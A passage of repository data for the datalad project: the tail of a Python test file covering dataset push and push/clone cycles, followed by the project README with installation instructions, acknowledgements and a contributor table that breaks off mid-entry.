3,\n action=\"copy\", type=\"file\", status=\"notneeded\")\n\n\n@known_failure_githubci_osx\n@with_tree(tree={\"ds\": {\"f0\": \"0\"}})\ndef test_push_matching(path=None):\n path = Path(path)\n ds = Dataset(path / \"ds\").create(force=True)\n ds.config.set('push.default', 'matching', scope='local')\n ds.save()\n remote_ds = mk_push_target(ds, 'local', str(path / 'dssibling'),\n annex=True, bare=False)\n # that fact that the next one even runs makes sure that we are in a better\n # place than https://github.com/datalad/datalad/issues/4888\n ds.push(to='local')\n # and we pushed the commit in the current branch\n eq_(remote_ds.get_hexsha(DEFAULT_BRANCH),\n ds.repo.get_hexsha(DEFAULT_BRANCH))\n\n\n@slow # can run over 30 sec when running in parallel with n=2. Cannot force serial yet, see https://github.com/pytest-dev/pytest-xdist/issues/385\n@known_failure_githubci_win # recent git-annex, https://github.com/datalad/datalad/issues/7184\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_nested_pushclone_cycle_allplatforms(origpath=None, storepath=None, clonepath=None):\n if 'DATALAD_SEED' in os.environ:\n # we are using create-sibling-ria via the cmdline in here\n # this will create random UUIDs for datasets\n # however, given a fixed seed each call to this command will start\n # with the same RNG seed, hence yield the same UUID on the same\n # machine -- leading to a collision\n raise SkipTest(\n 'Test incompatible with fixed random number generator seed')\n # the aim here is this high-level test a std create-push-clone cycle for a\n # dataset with a subdataset, with the goal to ensure that correct branches\n # and commits are tracked, regardless of platform behavior and condition\n # of individual clones. Nothing fancy, just that the defaults behave in\n # sensible ways\n from datalad.cmd import WitlessRunner as Runner\n run = Runner().run\n\n # create original nested dataset\n with chpwd(origpath):\n run(['datalad', 'create', 'super'])\n run(['datalad', 'create', '-d', 'super', str(Path('super', 'sub'))])\n\n # verify essential linkage properties\n orig_super = Dataset(Path(origpath, 'super'))\n orig_sub = Dataset(orig_super.pathobj / 'sub')\n\n (orig_super.pathobj / 'file1.txt').write_text('some1')\n (orig_sub.pathobj / 'file2.txt').write_text('some1')\n with chpwd(orig_super.path):\n run(['datalad', 'save', '--recursive'])\n\n # TODO not yet reported clean with adjusted branches\n #assert_repo_status(orig_super.path)\n\n # the \"true\" branch that sub is on, and the gitsha of the HEAD commit of it\n orig_sub_corr_branch = \\\n orig_sub.repo.get_corresponding_branch() or orig_sub.repo.get_active_branch()\n orig_sub_corr_commit = orig_sub.repo.get_hexsha(orig_sub_corr_branch)\n\n # make sure the super trackes this commit\n assert_in_results(\n orig_super.subdatasets(),\n path=orig_sub.path,\n gitshasum=orig_sub_corr_commit,\n # TODO it should also track the branch name\n # Attempted: https://github.com/datalad/datalad/pull/3817\n # But reverted: https://github.com/datalad/datalad/pull/4375\n )\n\n # publish to a store, to get into a platform-agnostic state\n # (i.e. no impact of an annex-init of any kind)\n store_url = 'ria+' + get_local_file_url(storepath)\n with chpwd(orig_super.path):\n run(['datalad', 'create-sibling-ria', '--recursive',\n '-s', 'store', store_url, '--new-store-ok'])\n run(['datalad', 'push', '--recursive', '--to', 'store'])\n\n # we are using the 'store' sibling's URL, which should be a plain path\n store_super = AnnexRepo(orig_super.siblings(name='store')[0]['url'], init=False)\n store_sub = AnnexRepo(orig_sub.siblings(name='store')[0]['url'], init=False)\n\n # both datasets in the store only carry the real branches, and nothing\n # adjusted\n for r in (store_super, store_sub):\n eq_(set(r.get_branches()), set([orig_sub_corr_branch, 'git-annex']))\n\n # and reobtain from a store\n cloneurl = 'ria+' + get_local_file_url(str(storepath), compatibility='git')\n with chpwd(clonepath):\n run(['datalad', 'clone', cloneurl + '#' + orig_super.id, 'super'])\n run(['datalad', '-C', 'super', 'get', '--recursive', '.'])\n\n # verify that nothing has changed as a result of a push/clone cycle\n clone_super = Dataset(Path(clonepath, 'super'))\n clone_sub = Dataset(clone_super.pathobj / 'sub')\n assert_in_results(\n clone_super.subdatasets(),\n path=clone_sub.path,\n gitshasum=orig_sub_corr_commit,\n )\n\n for ds1, ds2, f in ((orig_super, clone_super, 'file1.txt'),\n (orig_sub, clone_sub, 'file2.txt')):\n eq_((ds1.pathobj / f).read_text(), (ds2.pathobj / f).read_text())\n\n # get status info that does not recursive into subdatasets, i.e. not\n # looking for uncommitted changes\n # we should see no modification reported\n assert_not_in_results(\n clone_super.status(eval_subdataset_state='commit'),\n state='modified')\n # and now the same for a more expensive full status\n assert_not_in_results(\n clone_super.status(recursive=True),\n state='modified')\n\n\n@with_tempfile\ndef test_push_custom_summary(path=None):\n path = Path(path)\n ds = Dataset(path / \"ds\").create()\n\n sib = mk_push_target(ds, \"sib\", str(path / \"sib\"), bare=False, annex=False)\n (sib.pathobj / \"f1\").write_text(\"f1\")\n sib.save()\n\n (ds.pathobj / \"f2\").write_text(\"f2\")\n ds.save()\n\n # These options are true by default and our tests usually run with a\n # temporary home, but set them to be sure.\n ds.config.set(\"advice.pushUpdateRejected\", \"true\", scope=\"local\")\n ds.config.set(\"advice.pushFetchFirst\", \"true\", scope=\"local\")\n with swallow_outputs() as cmo:\n ds.push(to=\"sib\", result_renderer=\"default\", on_failure=\"ignore\")\n assert_in(\"Hints:\", cmo.out)\n assert_in(\"action summary:\", cmo.out)\n" }, { "alpha_fraction": 0.6425247192382812, "alphanum_fraction": 0.6942142248153687, "avg_line_length": 98.33082580566406, "blob_id": "53098b3f32c34ddc5e160c1042735e3c2a2c6a46", "content_id": "da4530be302b785c19001ad5d50c6ae2a31f439f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 26579, "license_type": "permissive", "max_line_length": 625, "num_lines": 266, "path": "/README.md", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": " ____ _ _ _ \n | _ \\ __ _ | |_ __ _ | | __ _ __| |\n | | | | / _` | | __| / _` | | | / _` | / _` |\n | |_| | | (_| | | |_ | (_| | | |___ | (_| | | (_| |\n |____/ \\__,_| \\__| \\__,_| |_____| \\__,_| \\__,_|\n Read me\n\n[![DOI](https://joss.theoj.org/papers/10.21105/joss.03262/status.svg)](https://doi.org/10.21105/joss.03262)\n[![Travis tests status](https://app.travis-ci.com/datalad/datalad.svg?branch=master)](https://app.travis-ci.com/datalad/datalad)\n[![Build status](https://ci.appveyor.com/api/projects/status/github/datalad/datalad?branch=master&svg=true)](https://ci.appveyor.com/project/mih/datalad/branch/master)\n[![Extensions](https://github.com/datalad/datalad/actions/workflows/test_extensions.yml/badge.svg)](https://github.com/datalad/datalad/actions/workflows/test_extensions.yml)\n[![Linters](https://github.com/datalad/datalad/actions/workflows/lint.yml/badge.svg)](https://github.com/datalad/datalad/actions/workflows/lint.yml)\n[![codecov.io](https://codecov.io/github/datalad/datalad/coverage.svg?branch=master)](https://codecov.io/github/datalad/datalad?branch=master)\n[![Documentation](https://readthedocs.org/projects/datalad/badge/?version=latest)](http://datalad.rtfd.org)\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n[![GitHub release](https://img.shields.io/github/release/datalad/datalad.svg)](https://GitHub.com/datalad/datalad/releases/)\n[![Supported Python versions](https://img.shields.io/pypi/pyversions/datalad)](https://pypi.org/project/datalad/)\n[![Testimonials 4](https://img.shields.io/badge/testimonials-4-brightgreen.svg)](https://github.com/datalad/datalad/wiki/Testimonials)\n[![https://www.singularity-hub.org/static/img/hosted-singularity--hub-%23e32929.svg](https://www.singularity-hub.org/static/img/hosted-singularity--hub-%23e32929.svg)](https://singularity-hub.org/collections/667)\n[![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg)](https://github.com/datalad/datalad/blob/master/CODE_OF_CONDUCT.md)\n[![DOI](https://zenodo.org/badge/DOI/10.5281/zenodo.808846.svg)](https://doi.org/10.5281/zenodo.808846)\n[![RRID](https://img.shields.io/badge/RRID-SCR__003931-blue)](https://identifiers.org/RRID:SCR_003931)\n<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n[![All Contributors](https://img.shields.io/badge/all_contributors-49-orange.svg?style=flat-square)](#contributors-)\n<!-- ALL-CONTRIBUTORS-BADGE:END -->\n\n## Distribution\n\n[![Anaconda](https://anaconda.org/conda-forge/datalad/badges/version.svg)](https://anaconda.org/conda-forge/datalad)\n[![Arch (AUR)](https://repology.org/badge/version-for-repo/aur/datalad.svg?header=Arch%20%28%41%55%52%29)](https://repology.org/project/datalad/versions)\n[![Debian Stable](https://badges.debian.net/badges/debian/stable/datalad/version.svg)](https://packages.debian.org/stable/datalad)\n[![Debian Unstable](https://badges.debian.net/badges/debian/unstable/datalad/version.svg)](https://packages.debian.org/unstable/datalad)\n[![Fedora Rawhide package](https://repology.org/badge/version-for-repo/fedora_rawhide/datalad.svg?header=Fedora%20%28rawhide%29)](https://repology.org/project/datalad/versions)\n[![Gentoo (::science)](https://repology.org/badge/version-for-repo/gentoo_ovl_science/datalad.svg?header=Gentoo%20%28%3A%3Ascience%29)](https://repology.org/project/datalad/versions)\n[![PyPI package](https://repology.org/badge/version-for-repo/pypi/datalad.svg?header=PyPI)](https://repology.org/project/datalad/versions)\n\n# 10000-ft. overview\n\nDataLad makes data management and data distribution more accessible.\nTo do that, it stands on the shoulders of [Git] and [Git-annex] to deliver a\ndecentralized system for data exchange. This includes automated ingestion of\ndata from online portals and exposing it in readily usable form as Git(-annex)\nrepositories, so-called datasets. The actual data storage and permission\nmanagement, however, remains with the original data providers.\n\nThe full documentation is available at http://docs.datalad.org and\nhttp://handbook.datalad.org provides a hands-on crash-course on DataLad.\n\n# Extensions\n\nA number of extensions are available that provide additional functionality for\nDataLad. Extensions are separate packages that are to be installed in addition\nto DataLad. In order to install DataLad customized for a particular domain, one\ncan simply install an extension directly, and DataLad itself will be\nautomatically installed with it. An [annotated list of\nextensions](http://handbook.datalad.org/extension_pkgs.html) is available in\nthe [DataLad handbook](http://handbook.datalad.org).\n\n\n# Support\n\nThe documentation for this project is found here:\nhttp://docs.datalad.org\n\nAll bugs, concerns, and enhancement requests for this software can be submitted here:\nhttps://github.com/datalad/datalad/issues\n\nIf you have a problem or would like to ask a question about how to use DataLad,\nplease [submit a question to\nNeuroStars.org](https://neurostars.org/new-topic?body=-%20Please%20describe%20the%20problem.%0A-%20What%20steps%20will%20reproduce%20the%20problem%3F%0A-%20What%20version%20of%20DataLad%20are%20you%20using%20%28run%20%60datalad%20--version%60%29%3F%20On%20what%20operating%20system%20%28consider%20running%20%60datalad%20plugin%20wtf%60%29%3F%0A-%20Please%20provide%20any%20additional%20information%20below.%0A-%20Have%20you%20had%20any%20luck%20using%20DataLad%20before%3F%20%28Sometimes%20we%20get%20tired%20of%20reading%20bug%20reports%20all%20day%20and%20a%20lil'%20positive%20end%20note%20does%20wonders%29&tags=datalad)\nwith a `datalad` tag. NeuroStars.org is a platform similar to StackOverflow\nbut dedicated to neuroinformatics.\n\nAll previous DataLad questions are available here:\nhttp://neurostars.org/tags/datalad/\n\n\n# Installation\n\n## Debian-based systems\n\nOn Debian-based systems, we recommend enabling [NeuroDebian], via which we\nprovide recent releases of DataLad. Once enabled, just do:\n\n apt-get install datalad\n\n## Gentoo-based systems\n\nOn Gentoo-based systems (i.e. all systems whose package manager can parse ebuilds as per the [Package Manager Specification]), we recommend [enabling the ::science overlay], via which we\nprovide recent releases of DataLad. Once enabled, just run:\n\n emerge datalad\n\n## Other Linux'es via conda\n\n conda install -c conda-forge datalad\n\nwill install the most recently released version, and release candidates are\navailable via\n\n conda install -c conda-forge/label/rc datalad\n\n## Other Linux'es, macOS via pip\n\nBefore you install this package, please make sure that you [install a recent\nversion of git-annex](https://git-annex.branchable.com/install). Afterwards,\ninstall the latest version of `datalad` from\n[PyPI](https://pypi.org/project/datalad). It is recommended to use\na dedicated [virtualenv](https://virtualenv.pypa.io):\n\n # Create and enter a new virtual environment (optional)\n virtualenv --python=python3 ~/env/datalad\n . ~/env/datalad/bin/activate\n\n # Install from PyPI\n pip install datalad\n\nBy default, installation via pip installs the core functionality of DataLad,\nallowing for managing datasets etc. Additional installation schemes\nare available, so you can request enhanced installation via\n`pip install datalad[SCHEME]`, where `SCHEME` could be:\n\n- `tests`\n to also install dependencies used by DataLad's battery of unit tests\n- `full`\n to install all dependencies.\n\nMore details on installation and initial configuration can be found in the\n[DataLad Handbook: Installation].\n\n# License\n\nMIT/Expat\n\n\n# Contributing\n\nSee [CONTRIBUTING.md](CONTRIBUTING.md) if you are interested in internals or\ncontributing to the project. \n\n## Acknowledgements\n\nThe DataLad project received support through the following grants:\n\n- US-German collaboration in computational neuroscience (CRCNS) project\n \"DataGit: converging catalogues, warehouses, and deployment logistics into a\n federated 'data distribution'\" (Halchenko/Hanke), co-funded by the US National\n Science Foundation (NSF 1429999) and the German Federal Ministry of\n Education and Research (BMBF 01GQ1411).\n\n- CRCNS US-German Data Sharing \"DataLad - a decentralized system for integrated\n discovery, management, and publication of digital objects of science\"\n (Halchenko/Pestilli/Hanke), co-funded by the US National Science Foundation\n (NSF 1912266) and the German Federal Ministry of Education and Research\n (BMBF 01GQ1905).\n\n- Helmholtz Research Center Jülich, FDM challenge 2022\n\n- German federal state of Saxony-Anhalt and the European Regional Development\n Fund (ERDF), Project: Center for Behavioral Brain Sciences, Imaging Platform\n\n- ReproNim project (NIH 1P41EB019936-01A1).\n\n- Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) under grant\n SFB 1451 ([431549029](https://gepris.dfg.de/gepris/projekt/431549029),\n INF project)\n\n- European Union’s Horizon 2020 research and innovation programme under grant\n agreements:\n - [Human Brain Project SGA3 (H2020-EU.3.1.5.3, grant no. 945539)](https://cordis.europa.eu/project/id/945539)\n - [VirtualBrainCloud (H2020-EU.3.1.5.3, grant no. 826421)](https://cordis.europa.eu/project/id/826421)\n\nMac mini instance for development is provided by\n[MacStadium](https://www.macstadium.com/).\n\n\n### Contributors ✨\n\nThanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)):\n\n<!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section -->\n<!-- prettier-ignore-start -->\n<!-- markdownlint-disable -->\n<table>\n <tbody>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/glalteva\"><img src=\"https://avatars2.githubusercontent.com/u/14296143?v=4?s=100\" width=\"100px;\" alt=\"glalteva\"/><br /><sub><b>glalteva</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=glalteva\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/adswa\"><img src=\"https://avatars1.githubusercontent.com/u/29738718?v=4?s=100\" width=\"100px;\" alt=\"adswa\"/><br /><sub><b>adswa</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=adswa\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/chrhaeusler\"><img src=\"https://avatars0.githubusercontent.com/u/8115807?v=4?s=100\" width=\"100px;\" alt=\"chrhaeusler\"/><br /><sub><b>chrhaeusler</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=chrhaeusler\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/soichih\"><img src=\"https://avatars3.githubusercontent.com/u/923896?v=4?s=100\" width=\"100px;\" alt=\"soichih\"/><br /><sub><b>soichih</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=soichih\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/mvdoc\"><img src=\"https://avatars1.githubusercontent.com/u/6150554?v=4?s=100\" width=\"100px;\" alt=\"mvdoc\"/><br /><sub><b>mvdoc</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=mvdoc\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/mih\"><img src=\"https://avatars1.githubusercontent.com/u/136479?v=4?s=100\" width=\"100px;\" alt=\"mih\"/><br /><sub><b>mih</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=mih\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/yarikoptic\"><img src=\"https://avatars3.githubusercontent.com/u/39889?v=4?s=100\" width=\"100px;\" alt=\"yarikoptic\"/><br /><sub><b>yarikoptic</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=yarikoptic\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/loj\"><img src=\"https://avatars2.githubusercontent.com/u/15157717?v=4?s=100\" width=\"100px;\" alt=\"loj\"/><br /><sub><b>loj</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=loj\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/feilong\"><img src=\"https://avatars2.githubusercontent.com/u/2242261?v=4?s=100\" width=\"100px;\" alt=\"feilong\"/><br /><sub><b>feilong</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=feilong\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/jhpoelen\"><img src=\"https://avatars2.githubusercontent.com/u/1084872?v=4?s=100\" width=\"100px;\" alt=\"jhpoelen\"/><br /><sub><b>jhpoelen</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=jhpoelen\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/andycon\"><img src=\"https://avatars1.githubusercontent.com/u/3965889?v=4?s=100\" width=\"100px;\" alt=\"andycon\"/><br /><sub><b>andycon</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=andycon\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/nicholsn\"><img src=\"https://avatars3.githubusercontent.com/u/463344?v=4?s=100\" width=\"100px;\" alt=\"nicholsn\"/><br /><sub><b>nicholsn</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=nicholsn\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/adelavega\"><img src=\"https://avatars0.githubusercontent.com/u/2774448?v=4?s=100\" width=\"100px;\" alt=\"adelavega\"/><br /><sub><b>adelavega</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=adelavega\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/kskyten\"><img src=\"https://avatars0.githubusercontent.com/u/4163878?v=4?s=100\" width=\"100px;\" alt=\"kskyten\"/><br /><sub><b>kskyten</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=kskyten\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/TheChymera\"><img src=\"https://avatars2.githubusercontent.com/u/950524?v=4?s=100\" width=\"100px;\" alt=\"TheChymera\"/><br /><sub><b>TheChymera</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=TheChymera\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/effigies\"><img src=\"https://avatars0.githubusercontent.com/u/83442?v=4?s=100\" width=\"100px;\" alt=\"effigies\"/><br /><sub><b>effigies</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=effigies\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/jgors\"><img src=\"https://avatars1.githubusercontent.com/u/386585?v=4?s=100\" width=\"100px;\" alt=\"jgors\"/><br /><sub><b>jgors</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=jgors\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/debanjum\"><img src=\"https://avatars1.githubusercontent.com/u/6413477?v=4?s=100\" width=\"100px;\" alt=\"debanjum\"/><br /><sub><b>debanjum</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=debanjum\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/nellh\"><img src=\"https://avatars3.githubusercontent.com/u/11369795?v=4?s=100\" width=\"100px;\" alt=\"nellh\"/><br /><sub><b>nellh</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=nellh\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/emdupre\"><img src=\"https://avatars3.githubusercontent.com/u/15017191?v=4?s=100\" width=\"100px;\" alt=\"emdupre\"/><br /><sub><b>emdupre</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=emdupre\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/aqw\"><img src=\"https://avatars0.githubusercontent.com/u/765557?v=4?s=100\" width=\"100px;\" alt=\"aqw\"/><br /><sub><b>aqw</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=aqw\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/vsoch\"><img src=\"https://avatars0.githubusercontent.com/u/814322?v=4?s=100\" width=\"100px;\" alt=\"vsoch\"/><br /><sub><b>vsoch</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=vsoch\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/kyleam\"><img src=\"https://avatars2.githubusercontent.com/u/1297788?v=4?s=100\" width=\"100px;\" alt=\"kyleam\"/><br /><sub><b>kyleam</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=kyleam\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/driusan\"><img src=\"https://avatars0.githubusercontent.com/u/498329?v=4?s=100\" width=\"100px;\" alt=\"driusan\"/><br /><sub><b>driusan</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=driusan\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/overlake333\"><img src=\"https://avatars1.githubusercontent.com/u/28018084?v=4?s=100\" width=\"100px;\" alt=\"overlake333\"/><br /><sub><b>overlake333</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=overlake333\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/akeshavan\"><img src=\"https://avatars0.githubusercontent.com/u/972008?v=4?s=100\" width=\"100px;\" alt=\"akeshavan\"/><br /><sub><b>akeshavan</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=akeshavan\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/jwodder\"><img src=\"https://avatars1.githubusercontent.com/u/98207?v=4?s=100\" width=\"100px;\" alt=\"jwodder\"/><br /><sub><b>jwodder</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=jwodder\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/bpoldrack\"><img src=\"https://avatars2.githubusercontent.com/u/10498301?v=4?s=100\" width=\"100px;\" alt=\"bpoldrack\"/><br /><sub><b>bpoldrack</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=bpoldrack\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/yetanothertestuser\"><img src=\"https://avatars0.githubusercontent.com/u/19335420?v=4?s=100\" width=\"100px;\" alt=\"yetanothertestuser\"/><br /><sub><b>yetanothertestuser</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=yetanothertestuser\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/christian-monch\"><img src=\"https://avatars.githubusercontent.com/u/17925232?v=4?s=100\" width=\"100px;\" alt=\"Christian Mönch\"/><br /><sub><b>Christian Mönch</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=christian-monch\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/mattcieslak\"><img src=\"https://avatars.githubusercontent.com/u/170026?v=4?s=100\" width=\"100px;\" alt=\"Matt Cieslak\"/><br /><sub><b>Matt Cieslak</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=mattcieslak\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/mikapfl\"><img src=\"https://avatars.githubusercontent.com/u/7226087?v=4?s=100\" width=\"100px;\" alt=\"Mika Pflüger\"/><br /><sub><b>Mika Pflüger</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=mikapfl\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://me.ypid.de/\"><img src=\"https://avatars.githubusercontent.com/u/1301158?v=4?s=100\" width=\"100px;\" alt=\"Robin Schneider\"/><br /><sub><b>Robin Schneider</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=ypid\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://orcid.org/0000-0003-4652-3758\"><img src=\"https://avatars.githubusercontent.com/u/7570456?v=4?s=100\" width=\"100px;\" alt=\"Sin Kim\"/><br /><sub><b>Sin Kim</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=kimsin98\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/DisasterMo\"><img src=\"https://avatars.githubusercontent.com/u/49207524?v=4?s=100\" width=\"100px;\" alt=\"Michael Burgardt\"/><br /><sub><b>Michael Burgardt</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=DisasterMo\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://remi-gau.github.io/\"><img src=\"https://avatars.githubusercontent.com/u/6961185?v=4?s=100\" width=\"100px;\" alt=\"Remi Gau\"/><br /><sub><b>Remi Gau</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=Remi-Gau\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/mslw\"><img src=\"https://avatars.githubusercontent.com/u/11985212?v=4?s=100\" width=\"100px;\" alt=\"Michał Szczepanik\"/><br /><sub><b>Michał Szczepanik</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=mslw\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/bpinsard\"><img src=\"https://avatars.githubusercontent.com/u/1155388?v=4?s=100\" width=\"100px;\" alt=\"Basile\"/><br /><sub><b>Basile</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=bpinsard\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/taylols\"><img src=\"https://avatars.githubusercontent.com/u/28018084?v=4?s=100\" width=\"100px;\" alt=\"Taylor Olson\"/><br /><sub><b>Taylor Olson</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=taylols\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://jdkent.github.io/\"><img src=\"https://avatars.githubusercontent.com/u/12564882?v=4?s=100\" width=\"100px;\" alt=\"James Kent\"/><br /><sub><b>James Kent</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=jdkent\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/xgui3783\"><img src=\"https://avatars.githubusercontent.com/u/19381783?v=4?s=100\" width=\"100px;\" alt=\"xgui3783\"/><br /><sub><b>xgui3783</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=xgui3783\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/tstoeter\"><img src=\"https://avatars.githubusercontent.com/u/4901704?v=4?s=100\" width=\"100px;\" alt=\"tstoeter\"/><br /><sub><b>tstoeter</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=tstoeter\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://jsheunis.github.io/\"><img src=\"https://avatars.githubusercontent.com/u/10141237?v=4?s=100\" width=\"100px;\" alt=\"Stephan Heunis\"/><br /><sub><b>Stephan Heunis</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=jsheunis\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://www.mmmccormick.com\"><img src=\"https://avatars.githubusercontent.com/u/25432?v=4?s=100\" width=\"100px;\" alt=\"Matt McCormick\"/><br /><sub><b>Matt McCormick</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=thewtex\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a 